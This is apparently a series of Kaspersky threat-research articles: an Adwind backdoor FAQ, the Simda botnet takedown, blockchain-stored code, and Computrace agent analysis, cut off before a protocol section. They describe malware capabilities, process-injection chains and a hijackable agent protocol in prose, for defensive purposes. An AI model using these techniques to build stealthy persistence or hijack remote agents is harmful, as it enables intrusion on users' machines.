The malware sample we received was sent by email to some banks in Singapore on behalf of a major Malaysian bank. The IP address of the e-mail senders points to a server in Romania while the mail server and account used belong to a company located in Russia.

Adwind is a backdoor written purely in Java that targets system supporting the Java runtime environment. The malware program operates by sending out system information and accepting commands from a remote attacker. These commands can be used, among other things, to display messages on the system, open URLs, update the malware, download/execute files, and download/load plugins. A significant amount of additional functionality can be provided through downloadable plugins, including such things as remote control options and shell command execution.

We would like to encourage enterprises to review the purpose of using a Java platform and to disable it for all unauthorized sources.

What exactly is Adwind?

Adwind is a cross-platform, multifunctional backdoor, which can run on Windows, Mac OS, Linux and Android OS.

Is this a nation-state sponsored campaign?

This is not a nation-state sponsored campaign. We believe that it was developed and used mostly by cybercriminals.

Who are the victims? / What can you say about the targets of the attacks?

The victims range from random people that launched the malware following an opportunistic attack to specific organizations, most of which are small and medium-sized businesses.

How did you become aware of this threat? Who reported it?

From one of our partners we received part of an email with a .JAR attachment. The profile of the partner company and the contents of the email indicated a targeted attack attempt. While the partner was not compromised we decided to check the attachment, which led us to the malware platform.

How does Adwind infect computers?

Adwind doesn’t self-infect computers or spread automatically. It relies on user interaction: double-clicking the .JAR attachment in the email or doing the same from an archive. Alternatively, it can be spread via other containers like .hta or .vbs files, which install Java if it’s not available on the system and download the main Adwind.JAR file from a remote server.

Are the attackers using any zero-day vulnerabilities?

We have not seen attackers using zero-day vulnerabilities together with Adwind.

What exactly is being stolen from the target machines?

Limited only by the intelligence needs of the attackers, the malware can:

• collect keystrokes
• steal cached passwords and grab data from web forms
• take screenshots
• take pictures and record video from the webcam
• record sound from the microphone
• transfer files
• collect general system and user information
• steal keys for cryptocurrency wallets
• manage SMS (for Android)
• steals VPN certificates

Is this a Windows-only threat? Which versions of Windows are targeted? Are there Mac OS X or Linux variants?

This malware is capable of running on any platform that has a modern Java runtime environment installed, which includes all Java-supported versions of Windows, Mac OS X, Linux and potentially other platforms which run Java.

Have you seen any evidence of a mobile component – iOS, Android or BlackBerry?

We have seen Adwind .apk files that can run on Android OS, however iOS and BlackBerry are out of the scope of this platform.

It seems Adwind is all about Java. Why do you think it is so?

Java applications by design should be platform independent. While certain system architectures are quite specific and there is a set of Java libraries designed for them, general purpose code may run on any system that has a Java runtime environment installed. This makes Java a very convenient platform for which to develop malware that can run on any platform.

Do you know the total number of victims?

We have our own estimate of targets attacked by this malware. It is more than 443,000 covering the period from 2013 to the beginning of 2016.

What is the geography of victims?

The geography of victims changed over time. In 2013, Arabic and Spanish-speaking countries were the top targets. In 2014, the most attacked countries were Turkey and India, followed by UAE, the US and Vietnam. In 2015, Russia was the most attacked country, with UAE and Turkey again near the top, along with the USA, Turkey and Germany.

What are the attacked industries?

During their investigation the Kaspersky Lab researchers were able to analyze nearly 200 examples of spear-phishing attacks organized by unknown criminals to spread the Adwind malware, and were able to identify the industries most of the targets worked in:

• Manufacturing
• Finance
• Engineering
• Design
• Retail
• Government
• Shipping
• Telecom
• Software
• Education
• Food production
• Healthcare
• Media
• Energy

Based on information from Kaspersky Security Network, the 200 examples of spear-phishing attacks observed in the six months between August 2015 and January 2016 resulted in Adwind RAT malware samples being encountered by more than 68,000 users.

Who are the clients of Adwind? Where are they from? How many? Are they APT actors?

To begin with, Adwind only had a Spanish interface; however it now also has an English interface and is recognized by cybercriminals from many countries. We believe that clients of the Adwind platform fall into the following categories:

1. Scammers that want to move to the next level (using malware for more advanced fraud)
2. Unfair competitors
3. Cyber-mercenaries (spies for hire)
4. Private individuals that want to spy on people they know

How is this different from any other APT attack?

Adwind is not an APT attack. It is a platform with rich capabilities that cybercriminals can use to conduct cyber-espionage.

Are there multiple variants of Adwind? Are there any major differences in the variants?

There have been multiple generations of Adwind, which has been continuously developed and supported since at least 2012. The differences are mostly about malware features and available modules, however all variants rely on the same basic scheme of client-server communication. It’s designed to send commands in an ad-hoc manner, which introduces a constraint of controlling a large number of compromised machines. We believe that it’s not suitable for even medium-sized botnets and used only for targeted network penetrations.

Is the command-and-control servers used by Adwind still active? Have you been able to sinkhole any of the C&Cs?

The Adwind malware is used by hundreds of criminals, which means that there are hundreds of command and control servers. Some of them are down, some are up, the others are turned on as required. It’s not easy and not efficient to take them down in the traditional way. Most of them rely on free Dynamic DNS providers and are not real domain registrations.

Who is responsible for this threat?

We cannot speculate publically about attribution.

How long have the attackers been active?

The users of Adwind malware have been active since at least 2012 with a large spike of users at the end of 2015.

Did the attackers use any interesting/advanced technologies?

Generally speaking, the Java platform is not a common platform for malware at all. It is mainly related to the requirement of having a Java runtime environment on the victim’s system, the size of the generated code and availability of decompilers for Java classes. The author of the Adwind malware attempted to solve all these problems by introducing a number of workarounds.

Does Kaspersky Lab detect all variants of this malware?

Kaspersky Lab products detect all variants of this malware that we know about. The full list is available in the Appendix of our public report.

Are there Indicators of Compromise (IOCs) to help victims identify the intrusion?

Yes, there are many known domains and IP addresses used by the Adwind attackers. The full list is available in the Appendix of our public report.

What is JSocket? How long does it exist?

JSocket is the latest reincarnation of Adwind RAT, and available through online subscription. It was launched in June 2015 and is still running.

What is the problem with just interrupting the JSocket service?

Interrupting the service by suspending the domain or taking down the server wasn’t efficient in the past and led to yet another rebranding and restart of the platform.

What is the difference between JSocket and Adwind?

The Adwind RAT and the JSocket RAT are based on the same source code and were most likely developed by the same author. While Adwind was abandoned some time ago, JSocket still exists and is just another “brand” of the same RAT. As JSocket is the latest variant of the backdoor it has many more features and a rebuilt UI.

How many people you think are behind the whole MaaS platform?

We believe that the platform is in the hands of just one hardworking individual, who sometimes outsources tasks to external developers.

You estimated the revenue of the whole service as 200k per year. How did you calculate this figure?

Based on users’ activity on the internal message board and some other observations, we estimated a number of users in the system as 1,800 by the end of 2015. By making certain assumptions on the percentage of paid accounts, service costs and most probable distribution of the paid customers, we concluded that such a service may generate up to $200K USD annually. However, this is just an estimation of revenue, which doesn’t necessarily mean that the author has already received this money. One important fact is that the latest version of the portal was launched only in summer 2015.

Have you reported your findings to LEA? What was the outcome?

We believe that reporting to Law Enforcement is the best way to combat cybercrime. Yes, we have reported the case of the attempted computer attack which we investigated in depth from the very beginning, based on information provided by our research partner. The information was received but apparently it takes time to verify and process such reports to start an investigation. The reporter doesn’t normally get an update from a police investigation, with the exception of requests for some additional information.

To find out more about withstanding Adwind-based attacks, read this article in the Kaspersky Business Blog.

For any inquiries, please contact intelreports@kaspersky.com

On 9 April, 2015 Kaspersky Lab was involved in the synchronized Simda botnet takedown operation coordinated by INTERPOL Global Complex for Innovation. In this case the investigation was initially started by Microsoft and expanded to involve a larger circle of participants including TrendMicro, the Cyber Defense Institute, officers from the Dutch National High Tech Crime Unit (NHTCU), the FBI, the Police Grand-Ducale Section Nouvelles Technologies in Luxembourg, and the Russian Ministry of the Interior’s Cybercrime Department “K” supported by the INTERPOL National Central Bureau in Moscow.

As a result of this takedown 14 C&C servers were seized in the Netherlands, USA, Luxembourg, Poland and Russia. Preliminary analysis of some of the sinkholed server logs revealed a list of 190 countries affected by the Simda botnet.

Simba character, courtesy of Walt Disney Productions, has nothing to do with Simda botnet

Simda is a mysterious botnet used for cybercriminal purposes, such as the dissemination of potentially unwanted and malicious software. This bot is mysterious because it rarely appears on our KSN radars despite compromising a large number of hosts every day. This is partly due to detection of emulation, security tools and virtual machines. It has a number of methods to detect research sandbox environments with a view to tricking researchers by consuming all CPU resources or notifying the botnet owner about the external IP address of the research network. Another reason is a server-side polymorphism and the limited lifetime of the bots.

Simda is distributed by a number of infected websites that redirect to exploit kits. The bot uses hardcoded IP addresses to notifying the master about various stages of execution process. It downloads and runs additional components from its own update servers and can modify the system hosts file. The latter is quite an interesting technique, even if it seems deceptively obvious at first glance.

Normally malware authors modify host files to tamper with search engine results or denylist certain security software websites, but the Simda bot adds unexpected records for google-analytics.com and connect.facebook.net to point to malicious IPs.

KL detected the #Simda #bot as Backdoor.Win32.Simda, it affected hundreds thousands victims worldwide

Tweet

Why is that, one might ask? We don’t know, but we believe that the answer is connected with Simda’s core purpose – the distribution of other malware. This criminal business model opens up the possibility of exclusive malware distribution. This means that the distributors can guarantee that only the client’s malware is installed on infected machines. And that becomes the case when Simda interprets a response from the C&C server – it can deactivate itself by preventing the bot to start after next reboot, instantly exiting. This deactivation coincides with the modification of the system hosts file. As a farewell touch, Simda replaces the original hosts file with a new one from its own body.

Now, curious mind may ask: how does it help them? Those domains are no longer used to generate search results, but machines infected by Simda in the past might occasionally continue to send out HTTP requests to malicious servers from time to time, even in when exclusive 3rd-party malware is supposed to have been installed.

We need to remember that these machines were initially infected by an exploit kit using a vulnerability in unpatched software. It’s highly likely that 3rd-party malware will be removed over time, but a careless user may never get round to updating vulnerable software.

If all those hosts keep coming back to the malicious servers and asking for web resources such as javascript files, the criminals could use the same exploits to re-infect the machines and sell them all over again – perhaps even ‘exclusively’ to the original client. This confirms once again – even criminals can’t trust criminals.

In this investigation Microsoft and various law enforcement bodies completed the sinkholing process and Kaspersky Lab willingly contributed to the preparations for the takedown. That work included technical analysis of malware, collecting infection statistics, advising on botnet takedown strategy and consulting our INTERPOL partners.

Kaspersky Lab detected the Simda bot as Backdoor.Win32.Simda and according to our estimations based on KSN statistics and telemetry from our partners it affected hundreds thousands victims worldwide.

Simda is automatically generated on demand and this is confirmed by the absence of any order in compilation link times. Below is a chart generated from a small subset of about 70 random Simda samples:

Samples link times in UTC timezone

The increase in link times is most likely related to the activity of the majority of Simda victims located somewhere between UTC-9 and UTC-5 timezones, which includes United States.

Thanks to the sinkhole operation and data sharing between partners we have put up a page where you can check if your IP has connected to Simda C&C servers in the past. If you suspect your computer was compromised you can use one of our free or trial solutions to scan your whole hard drive or install Kaspersky Internet Security for long-term protection.

Kaspersky Lab products currently detect hundreds of thousands of modifications of the Simda together with many different 3rd-party malware distributed during the Simda campaign.

References:

• INTERPOL press release
• Microsoft blog post on the Simda malware

Kaspersky Lab and INTERPOL recently presented research on how blockchain-based cryptocurrencies could be abused through the pollution of public decentralized databases with arbitrary data.  During our presentation at the BlackHat Asia conference in Singapore, we demonstrated the proof-of-concept using the Bitcoin network, but it’s important to understand that any cryptocurrency that relies on blockchain technology can be abused in this way.

Blockchain-based cryptocurrencies could be abused through the pollution of p2p databases with arbitrary data

Tweet

Some believe that security researchers, especially those from the anti-malware industry, generally only publish threat reports after the discovery of a threat in the wild.  However, this is not always true.  Our current research focuses on potential future threats that could be prevented before cryptocurrencies are fully adopted and standardized. While we generally support the idea of blockchain-based innovations, we think that, as part of the security community, it is our duty to help developers make such technologies fit-for-purpose and sustainable.

Blockchainware, short for blockchain-based software, stores some of its executable code in the decentralized databases of cryptocurrency transactions. It is based on the idea of establishing a connection to the P2P networks of cryptocurrency enthusiasts, fetching information from transaction records and running it as code. Depending on the payload fetched from the network, it can be either benign or malicious.

The proof-of-concept code we demonstrated was a benign piece of software

Tweet

To ensure the accurate interpretation of our research, we would like to point out that in the anti-malware industry, there is a clear definition of what constitutes malware, and there are extremely strict policies in place that forbid any attempts to create or distribute malware. The proof-of-concept code we demonstrated was a benign piece of software that opened the Notepad application after getting a confirmation from the user.

So, what exactly did we demonstrate at BlackHat Asia?   See for yourself at:  https://www.youtube.com/watch?v=FNsqXHbeMco

As we pointed out during our presentation, possible solutions can be introduced at different layers. From the perspective of a company developing endpoint security solutions, we don’t believe it’s too much trouble to denylist applications that load unpredictable external payload from a P2P network.

We believe that the value of solution development lies in its neutrality and decentralized decision-making

Tweet

However, from the perspective of the cryptocurrency network, it’s still an open question. We are not the experts in this field, and are therefore not best placed to propose effective solutions.  We also don’t want to promote any specific solution as we believe that the value of solution development (as in the case of Bitcoin) lies in its neutrality and decentralized decision-making.

That’s why we suggest this is a project for the cryptocurrency community.

We don’t promote any specific solution. We suggest this is a project for the cryptocurrency community

Tweet

As a starting point for opening a discussion in the community, we suggest looking for an opportunity to implement a network consensus/negotiation algorithm that will sustain the clean state of the blockchain.

I would like to credit my co-speaker, Christian Karam (@ck4r4m), Cyber Threat Researcher from Interpol for coming up with idea for this research and going all the way to the stage at Blackhat and beyond.

In response to numerous requests for comments and clarifications after our presentation at the Kaspersky Security Analyst Summit 2014, we have created this FAQ with some answers to the most commonly asked questions.

1. Why did you decide to expand this research after the presentation about Absolute Computrace in 2009?

Kaspersky Lab decided to undertake full research on this topic after discovering several privately owned laptops of Kaspersky Lab security researchers had the Computrace agent running without prior authorization. Such unauthorized activations quickly became alarming when our reverse engineering revealed serious vulnerabilities in the Computrace agent protocol design.

Absolute Software’s press release from 2009 claims that “The Computrace BIOS module is activated by the installation of Absolute Software by our customers, and is never forced upon any user. Computrace is designed to be activated, deactivated, controlled and managed by the customer using encrypted channels.”

However, we found signs of unauthorized activations on our hardware. Our research paper shows that actual versions of Computrace agent still use unencrypted channels. Due to this fact, we were able to conduct a live demo of a hijack of the Computrace agent at the SAS 2014 conference.

2. Did you contact Absolute Computrace before making your research public?

We notified Absolute Software via email and attached the full research paper draft. Here is a screenshot of the email message sent to Absolute Software on February 3, 2014:

Later that day we have received an automatic email from the Absolute Software mail server: “Delivery has failed to these recipients or distribution lists: security@absolute.com”

There were no other error messages which means that the email should have reached Absolute Software on other addresses in the list, however we have never received a formal response.

3. How recent was the Computrace agent variant you analyzed?

We analyzed several executables and laptops during the course of this research. The analyzed laptops were brand-new, purchased in 2012 with the top configurations available on the market according to the laptop owners.

The variant of the Computrace agent we used in our live demo was compiled in 2012:

4. How can I detect Computrace on a system?

The Simplest and most efficient way is to search for rpcnet.exe process in Task Manager or a file with the same name in your C:WindowsSystem32 directory. If found – you have Computrace activated. For an extended list of Computrace agent activity please see Appendix A of our research paper.

5. Should non-Windows users worry about unauthorized activations of Computrace?

As of now, we are not aware of EFI Firmware or BIOS Optional ROMS that have executables for non-Windows platforms, which means that the agent code will not be installed on non-Windows partitions. For details on how the agent is installed from BIOS please see our full research paper.

6. Does Computrace security issues affect non-Windows platforms?

Our research shows a security flaw in the Computrace agent protocol design which means that theoretically all agents for any platform may be affected. However, we have only confirmed the vulnerability in the Windows agent.

We are aware of Computrace products for Mac OS X and Android tablets. However, we have not analyzed the protocols they use.

Abstract

This report is a return to the problem of security mechanisms implemented in modern anti-theft technologies that reside in firmware and PC BIOS of commonly used laptops and some desktop computers. In particular, we have analyzed a number of standalone firmware files and personal computers. While physical security and a lack of proper code validation have already been shown in prior research by Core Labs, in our research we have focused on the network security aspect of such solutions. Our intention was to evaluate how secure Computrace Agent communications are and to see if it is possible to hijack control remotely.

1. Introduction

Modern computer systems that are widely used by individual consumers as well as large corporations have a number of pre-installed software that is shipped by an OEM manufacturer or a regional reseller to promote certain services and products. It might be difficult for an ordinary user to understand all the risks of such “extra-packages” existing on the system. While most of these products can be permanently removed or disabled by the user or an IT administrator, some types of product are designed to remain on the system even after professional system cleanup or total disk drive replacement. One such type of software is anti-theft technologies that are widely used on modern laptops, i.e., Absolute Computrace. While the general idea behind anti-theft technology is good, improper implementation can render it useless as well as harmful, or even extremely dangerous. We believe that companies producing anti-theft technologies must consider the security of their products extremely seriously.

Our research started with a real-life incident involving one of our colleagues. He observed repeated system process crashes on one of his personal laptops. The crash generated an event log record and a memory dump that was immediately analyzed. A quick check then led to a full research cycle which eventually resulted in this report.

The failure was related to instability in modules named identprv.dll and wceprv.dll that were loaded in the address space of one of the system service host processes (svchost.exe). A quick analysis of the file information revealed that these modules were created by Absolute Software and are part of the Absolute Computrace software. While Absolute Software is a legitimate company and information about Computrace product is available on the company’s official website, the owner of the system claimed he had never installed Absolute Computrace and didn’t even know the software was present on his computer. It could be assumed that the software was pre-installed by an OEM manufacturer or reseller company, but according to an Absolute Software whitepaper this should be done by users or their IT service. Unless you have a private IT service or your PC vendor took care of you, someone else has full access and control over your computer.

This single incident could have been dismissed if it wasn’t for the fact that we discovered more personal computers belonging to our researchers, as well as some enterprise computers, with the same signs of Computrace working on them without authorization. From a minor hindrance the situation quickly turned in to a major incident, and we decided to carry out an in-depth analysis.

2. Prior Research

One of the most significant contributions previously made on this subject is authored by Alfredo Ortega and Anibal Sacco of Core Security Technologies. In their whitepaper “Deactivate the Rootkit: Attacks on BIOS anti-theft technologies” they described the general mechanisms behind anti-theft products such as Absolute Computrace.

Prior research has shown a significant risk coming from anti-theft software embedded in BIOS ROMs or firmware. It demonstrated that these modules are vulnerable to local attacks, such as those requiring physical access or the ability to run code at local system. Alfredo Ortega and Anibal Sacco demonstrated a tool that can be used to change encrypted registry settings of the Absolute Computrace Agent so that it redirects to another control server.

In addition, we found a blogpost authored by Bradley Susser created in August 2012. The blog mentions a vulnerability in the authentication system of LoJack (Computrace) software. However, the post didn’t have enough proof to back up the claim, so we decided to embark on our own extended analysis.

3. Computrace Agent Normal Operation

Computrace Agent is a Windows application that has two variants: a small agent and a full-size agent. The Small Agent is a piece of code that is of minimal possible size and maximum extensibility. This module is embedded into BIOS PCI Option ROM or UEFI firmware. According to the US patent 20060272020 by Absolute Software, where it is called a mini CDA (Communications Driver Agent), it was designed to check if the full-function agent is installed and functioning on the system, and if not, load the full function CDA across the Internet from the server.

According to the patent, the persistence module resides in BIOS Option ROM:

BIOS Option ROM

The Option ROM contents has a small section with Computrace modules that are added by the manufacturer of the BIOS and written to the flash memory by the hardware vendor.

PCI Option Rom Absolute module contents

During our research we downloaded and looked into a few updates of BIOS firmware from official vendor support websites. Nowadays EFI BIOS can contain up to several hundred EFI drivers, applications and other modules packed into a type of file system. One of the modules we found was EFI Application or Option ROM in older systems with the Absolute Computrace Agent inside. So, if you try to reflash BIOS with official firmware, you just update the agent to a newer version.

rpcnetp.exe inside autochk.exe inside EFI Application inside another EFI-Application inside ROM Module

rpcnetp.exe inside autochk.exe inside EFI Application inside another EFI-Application inside ROM Module

We found that some laptops with Computrace in the firmware provide a configuration of the Computrace security feature in BIOS Setup Utility, but in others it is absent.

BIOS Setup Computrace settings on Lenovo Thinkpad X1

Computrace related settings are not visible in BIOS Setup of ASUS X102BA

It seems that the BIOS Setup Utility developer decides whether to include the feature to enable/disable the Computrace module in BIOS Setup. There are no policies that force him to implement this feature. This creates a serious obstacle for ordinary users in disabling Computrace.

Stage 1: BIOS module

The first stage (after main BIOS initialization) is to execute modules from Option ROM. At this point the Computrace code searches for available disk drives and analyzes the partition table. If FAT/FAT32/NTFS partitions are found, it locates the Windows installation path and autochk.exe application. Next, it creates a backup of system default autochk.exe code parts and overwrites them with its own code. These parts are saved as autochk.exe.bak file on an FAT or autochk.exe:BAK NTFS ADS. This can be used as an indicator of Computrace activity at stage one.

On some systems where the Computrace module is not part of the BIOS or it cannot be activated, a different approach is used. On such systems the Computrace activation code modifies the MBR of the hard drive and takes control of the PC at the earliest stage of the system boot. Apparently this approach is not as persistent as a BIOS-based dropper.

Stage 2: autochk.exe

At this stage a modified autochk.exe starts and has full access to the local file system as well as system registry via Windows NT Native API calls. Its main purpose is to drop the local file rpcnetp.exe and change the local system registry to create a new system service called rpcnetp. The original autochk.exe code is then restored.

Stage 3: rpcnetp.exe

This module is also known as the small Computrace Agent or mini CDA (Communication Driver Agent). It’s approximately 17 KB in size and is written in C language.

It is started as a Windows service; however, its operation is not limited to being a system service. This Windows PE executable copies itself to another file with a .DLL extension, modifies PE header flags accordingly to change the Windows PE EXE file to a Windows PE DLL and loads it in the memory. After that, rpcnetp.exe creates a child process “svchost.exe” in a suspended state and injects a freshly created rpcnetp.dll into its memory. When a DLL injection is successful and the svchost.exe process in resumed, the latter creates its own child process “iexplore.exe” started with the environment and rights of the locally logged-in user. A new iexplore.exe is started in a suspended state as well, and it receives an injection of the same rpcnetp.dll.

When iexplore.exe is resumed, it may connect to the Absolute Command & Control (C&C) server to get commands and download additional modules to execute.

rpcnetp.exe started two extra processes to initiate a connection with the Absolute C&C server

This technique is widely used in malicious software and was one of the reasons for a close interest in the modules. In fact, according to our experience, no other legitimate software uses techniques like this. Also, the software uses a time delay of about one minute. We assume that this delay is used to let the system find and connect to a Wi-Fi network after starting. But this is also used as a trick in many malicious applications to prevent malware detection which relies on emulators or sandboxes.

Why are there so many processes to accomplish the simple task of downloading an update? One possible answer is intentional obfuscation of the whole process to protect against reverse engineering. It is more difficult to analyze code that is running as a part of three different processes and has two boot variants: a DLL and an EXE file. It is known that the entry point procedure of EXE and DLL files differ in terms of the number of parameters passed at the start function. While the DLL and EXE variants execute the same code, all potential problems are dealt with quite well, so the code doesn’t crash or cause any instability.

In addition, we have seen certain anti-disassembling and anti-debugging tricks that we use to perform a more rigorous analysis. After a successful start, rpcnetp.exe removes a registry service entry. This entry will be recreated with the next system start if rpcnetp.exe failed to connect to the C&C server.

We believe the reason it runs in the iexplore.exe process context is to guarantee the availability of the Internet. The svchost.exe process running with Local System rights starts iexplore.exe in the context of a locally logged-in user. Therefore, if the user has Internet access via a proxy server, it will be automatically used when the agent connects to the C&C server. But why keep an extra svchost.exe process? This is apparently because of the limitations of iexplore.exe rights. So far, the svchost.exe process running with Local System privileges simply exploits iexplore.exe with user rights to pass the data to and from the server. This is implemented via a number of CreateRemoteThread, WriteProcessMemory, ReadProcessMemory system API calls. Actually, the rpcnetp.dll module spawns several threads per request to the C&C server. Due to frequent thread creation and termination, the whole system works rather slowly. We have recorded and analyzed a communication between the agent and C&C server. It’s noteworthy that the agent spawned 1355 new threads in svchost.exe and 452 in iexplore.exe to download less than 150KB of data. The network communications took about four minutes on a high-speed Internet link. During this time the agent issued 596 POST requests.

More details about the Small Agent network protocol can be found later in this report.

Unfortunately, the rpcnetp.exe module has no digital signature inside and no file information data. This makes it not only problematic for a system administrator to decide if it is a legitimate application but also makes it difficult to validate the integrity of the module’s code. We believe this is a serious flaw in current module implementation. In addition, if an attacker sets a read-only attribute for the modified file, it will never be replaced by a legitimate copy of rpcnetp.exe from BIOS.

Rpcnetp.exe has a rather interesting timestamp inside. When you collect several links or export table timestamps from different samples, it becomes obvious that they were altered by someone (note the repeating double-byte values in hex form).  Below are some of these timestamp values in hexadecimal form:

4aa04aa0
4aa44aa4
4aa54aa5
4aa64aa6
...
4f4c4f4c
4f504f50
4f954f95
4fc64fc6

This data is not used by the sample we analyzed and it’s unclear what kind of information it carries, but considering rpcnetp.exe has no file information data, it could be a marker with the agent version.

After all, the main purpose of rpcnetp.exe is to download and start a fully functional remote access tool. It communicates with a C&C server, relying on the built-in capabilities of the Small Agent to obtain some extra executables. The first executable that is sent to the agent is the file wceprv.dll, which is used to provide data encryption. Soon after saving wceprv.dll in the System32 directory, the Small Agent loads it in memory and switches conversation with the C&C to a more secure encrypted form. After that the Small Agent downloads extra files such as identprv.dll, Upgrd.exe and NTAgent.exe (later renamed to rpcnet.exe). Then it starts Upgrd.exe which is a single-run tool that handles an upgrade procedure: stopping and removing the current rpcnetp service and registering and starting a new service for rpcnet.exe (“Remote Procedure Call (RPC) Net”).

Stage 4: rpcnet.exe

When the rpcnet service starts successfully, it attempts to connect to the C&C server right away. The procedure is very similar to a rpcnetp service: it spawns child svchost.exe which creates iexplore.exe under the local user account. Like rpcnetp it creates many threads in these processes during communication with the C&C server. This service looks for configuration in several places on the system: registry key, reserved space on a hard drive and in its own body. The configuration states what server the agent should connect to. Surprisingly, it connects back to the same server and port as the previous rpcnetp service. We haven’t analyzed this service completely yet, but it’s absolutely clear that its main purpose is to provide extensible remote access to the machine running it.

4. Cases of Unauthorized Activations

We think having anti-theft technology is a good idea, but only if everything works the way it is supposed to. When something goes wrong, a technology that has been developed to protect might be used as a weapon to attack. We have no proof of Absolute Computrace being used as a platform for attacks, but we see the potential for this and some alarming and inexplicable facts make this increasingly likely.

One of the reasons for such in-depth research was the discovery of an unauthorized activation of a Computrace module in BIOS. We have observed several systems that seem to be affected by this mysterious problem.

The first natural reaction of PC owners was to remove or disable this feature as soon as possible. One user decided to completely stop using Windows on his PC due to Absolute Computrace functions. That created certain difficulties for us in post-mortem analysis, but we managed to collect enough information to find the key timestamps of Computrace Agent activity.

System A

The owner of the system claims that he never installed, activated or even seen any Absolute products. However, the system was obviously running Computrace Agent software.

PC belonging to a Kaspersky Lab employee with Computrace Agent

According to the user, the laptop was purchased on April 27, 2012. The laptop owner stated that he was present when the packaging was opened at the point of sale and the seal had not been broken. Later that day he switched on the laptop and booted up the system. The creation of the C:Users directory on the hard drive indicated the exact time (local time zone) of the first start: 20:31, April 27, 2012.

Next, the owner configured access to the Internet, which automatically generated Wireless LAN profile configuration files at C:ProgramDataMicrosoftWlansvcProfiles, which has the following creation time:20:52, April 27, 2012.

Soon after that the Computracerpcnetp.exe module woke up and attempted to communicate with a C&C server. We found that it downloaded an update which was saved in C:WindowsSysWOW64rpcnet.dll at21:29, April 27, 2012.

This proves that the owner of the laptop purchased it with the Computrace Agent pre-activated or activated automatically during the initial system installation.

Laptop Model: ASUS 1225B

System B

This system had obvious signs of Computrace Agent activity while the owner of the system stated that he has never installed or used any Absolute Software products.

Another private PC belonging to one of our colleagues

According to information from the file system, the C:Users directory was created on 2012-08-11 15:23:45 (local time zone). The owner recognized that as the date of purchase.

Then we found some more files:

C:WindowsSysWOW64wceprv.dll - 2012-08-11 19:39:41
C:WindowsSysWOW64rpcnet.exe - 2012-08-11 19:42:29
C:WindowsSysWOW64Upgrd.exe - 2012-08-11 19:42:44
C:WindowsSysWOW64rpcnet.dll - 2012-08-11 19:43:07

All these confirm that the Computrace Agent was installed on the day the laptop was purchased. The owner claimed that he broke the factory seal and started the OS in the store and later that day connected the laptop to his home Wi-Fi network. As in the case of System A, this means that the agent was pre-activated on System B.

Laptop Model: Samsung 900X3C

System C

During our research we made several attempts to find pre-activated Computrace in a number of local computer retail shops. In total we have manually checked more than 150 different configurations from various manufacturers. To our surprise, we have found just a single system that had rpcnet.exe running.

Backdoored PC at a local retail shop

We didn’t have the chance to fully analyze the system in the shop, but the fact that rpcnet.exe was running meant that rpcnetp.exe was started and had successfully downloaded the rpcnet.exe from the Internet. The laptop was on sale and when we asked why, a shop assistant explained that it had been returned by the first owner because of a broken keyboard. The keyboard was repaired after that and the laptop was put on sale at a discount. That means the laptop was used and probably connected to the Internet by the temporary owner or at the repair service. It’s unclear whether Computrace was activated by the user or by repair service staff, so we decided not to rely on this finding.

Laptop Model: Samsung NP670Z5E

We have contacted Absolute Computrace technical support service and provided serial numbers of hardware that had suspicious installation of Computrace Agents. The technical support assistant reported that those serial numbers were not in their database. We believe this means Computrace was not activated in the normal way. How it was activated, why and by whom remains a mystery.

Online Forum Reports

Beside that we have found several online messages by users claiming that Computrace is activated on their computers. Below are some examples of such claims found on online message boards:

One user claims he has never used Absolute Software products but it is running on his machine

Another user online claims he has a brand new laptop with preactivated Computrace

Yet another user claims he never ordered Computrace, but it was running

These and other claims of laptop owners suggest that unauthorized activations of Computrace products are possibly quite widespread.

5. Scale of Potential Problem

Using Kaspersky Security Network we have collected statistics on the number of computers where Absolute Computrace is activated.  Below is a map showing the geographical distribution of computers that have Computrace Agent running:

Our stats are limited to anonymous data from Kaspersky Lab products that have KSN enabled, which is a very small subset of all users online. According to our estimates, the real number of users with Computrace Agent activated on their computers may exceed 2 million. We have no information on how many of those users know that Computrace Agent is running on their systems.

In addition, we have collected statistics about the baseboard manufacturer names on computers where Computrace Agent is active.

absolutecomputrace_14s Baseboard manufacturers of systems where Computrace Agent is active

We have compared this chart to the chart of most popular PC Vendor manufacturers (according to Gartner for Q4 2013 Shipments).

Most popular PC vendors according to Gartner

You can see that with the exception of Toshiba, the TOP5 PC market players are in TOP6 of PCs where Computrace is active. According to Wikipedia, “On some Toshiba laptops rpcnetp.exe is preinstalled by Toshiba on the unit’s hard drive prior to shipment from the factory“. This explains why there are so many Toshiba computers with Computrace. However, it’s not so clear why the top two vendors: Lenovo and HP have a relatively low number of Computrace Agents on their PCs, while ACER and ASUS lower down the ranking have a more significant share of affected computers. We have found no public information about ASUS or ACER policies regarding Computrace activation or pre-installation on hard drives.

6. Computrace Agent Network Protocol

Soon after startup, rpcnetp.exe (the Small Agent) attempts to establish a TCP connection with the C&C server. It may connect via an IP address hard-coded in its body, set in the registry or stored on a hidden location on the hard disk. If direct communication by IP fails, it may try to resolve a domain name (typically search.namequery.com) and use a new IP instead.

Small Agent was expected to download and run additional executables. However, we haven’t found any specific functionality that was designed for downloading and running additional modules. Nevertheless, the extensibility of its protocol allows it to do absolutely anything including downloading and running extra modules. The US20060272020 patent has an interesting paragraph regarding the rpcnetp.exe communication protocol:

Deploying the Persistence Agent successfully in BIOS, for example, makes heavy use of an extensibility designed into the communications protocol. Without this extensibility the Agent would be larger and require frequent updates to add or change functionality. Such updates are neither practical nor economical, since the BIOS is programmed into the flash EEPROM of the platform and special tools (most often requiring user interaction) must be used to update the BIOS. Also, intensive testing is performed by the OEM on the BIOS since its integrity is critical to the operation of the computer.

Having read that, it becomes clear that we should not expect to find any classic implementation of an update mechanism. According to the patent, the Small Agent supports “A method to read and write the Agent’s memory space”. Basically, this is the core mechanism of running arbitrary code on the remote computer, sufficient to accomplish a download task.

Here is how communication between the Small Agent and a C&C looks in Wireshark network sniffer:

Part of network communication between Small Agent and C&C server

The whole communication consists of a series of POST requests and HTTP responses. The first request sent by the Small Agent has no payload; it’s an empty POST request. The server replies with a special HTTP header, Tag Id, that will be used until the end of conversation with the agent. Each HTTP response and subsequent POST request includes short binary data which forms a packet to process. HTTP is used in a very simple mode just as a carrier of the agent packets. The binary packets are crafted using Computrace’s basic communication protocol. While we see that the agent initiates an HTTP session and sends the first HTTP request to the server, the direction of real communication is opposite to that. The server responses are treated as request to the client and the client responds to these requests in the data added to the following HTTP POST request.

You can find the structure of such packets below:

